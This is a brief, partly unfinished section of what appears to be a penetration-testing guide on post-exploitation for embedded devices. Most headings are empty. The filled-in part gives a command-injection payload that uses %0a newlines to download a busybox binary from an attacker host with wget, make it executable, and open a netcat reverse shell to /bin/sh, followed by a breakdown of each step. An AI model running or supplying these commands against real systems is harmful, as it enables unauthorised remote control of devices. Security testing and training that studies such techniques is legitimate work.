6. Post exploitation & Persistence
WORK IN PROGRESS...
1. Gaining a shell (with additional binaries)
wget -O /tmp/<external-bin-name> http://<attacker_ip>:<listen_port>/<external-bin-name>
chmod 755 /tmp/<external-bin-name>1.1 netcat
wget -O /tmp/busybox-mipsel http://<attacker_ip>:<listen_port>/busybox-mipsel %0a chmod 755 /tmp/busybox-mipsel %0a /tmp/busybox-mipsel nc <attacker_ip> <shell_listen_port> -e /bin/sh 1.1.1 Breakdown of the payload commands:
wget -O /tmp/busybox-mipsel http://<attacker_ip>:<listen_port>/busybox-mipsel
chmod 755 /tmp/busybox-mipsel
/tmp/busybox-mipsel nc <attacker_ip> <shell_listen_port> -e /bin/sh1.1.2 Preparations on the attacker machine:
1.2. dropbear (ssh client)
1.3 socat
2. Gaining a shell (without additional binaries)
2.2 telnet
2.2.1 Breakdown of the payload commands:
2.2.2 Preparations on the attacker machine:
3. Additional improvements
3.3.1 Example usage
4. Persistence techniques
Last updated